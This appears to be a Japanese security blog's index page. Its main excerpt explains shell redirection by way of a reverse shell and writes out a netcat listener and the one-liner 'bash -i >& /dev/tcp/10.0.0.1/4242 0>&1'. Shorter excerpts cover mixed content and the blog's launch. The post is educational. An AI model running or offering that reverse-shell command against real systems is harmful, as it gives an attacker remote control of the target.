色々なリダイレクトを理解しようという試みである。
これがどのような意味を持つのかは今は一切考えず、 標準出力に 1, 標準エラー出力に 2 という文字列を出力するスクリプトを作成しておこう。
$ echo "echo 1 >&1" > redir
$ echo "echo 2 >&2" >> redir
$ chmod +x redir
脅威アクターは目的達成のために、ターゲットのシェルを奪う。
シェルを奪えれば、ターゲットのコントロールが格段に容易になる。
奪い方に色んな方法があるが、そのテクニックの一つに Reverse Shell があり、シェルを奪う普遍的な手法になっている。
これの良い点は、ターゲットからアクターの端末へ接続させるため、アクターからターゲットに直接アクセスできなくてもよいことだ。
攻撃側のシェルで接続を待機させる。典型例がこれだ。
$ nc -lnvp 4242
そして、ターゲットのシェルでなんとか以下を実行させられたら勝ち。外部へ入出力できるようになる。
$ bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
ペイロードの生成ツールやチートシートなしで入力するとなると結構難しいのではないかと思う。
シェルに詳しくなるためにも今回はこのコマンドを理解していきたい。
Mixed Contents とは HTTPS で読み込むコンテンツに HTTP で読み込むサブコンテンツが含まれている セキュリティ上の問題を指す。
Read More1 年前、さくらで運用していた tdiary が消滅してしまい、まとめていた情報をもとろも発信する場を失ってしまった。 つい最近までそれはそれで問題なかったのだが、ここ一ヶ月で環境が変わり、 脳への入力量が増えたことで知識の整理がしたくなったため、新しくブログつくってみた。 内容はセキュリティ関連や、ソフトウェアまわりのこととか、生活を書いていくと思う。 ちなみに今のところ、powered by zola+Netlify で運用してます。 初めて Static Site Generator を使っているけれども、どうなんだろうこれ。 自分にとってバックエンドによる動的動作が必要悪だったのかよくわからないけど、その存在を考えなくてよくなったのは良いかもと思っている。 何しろホスティングが楽だしね。
Read MoreSearch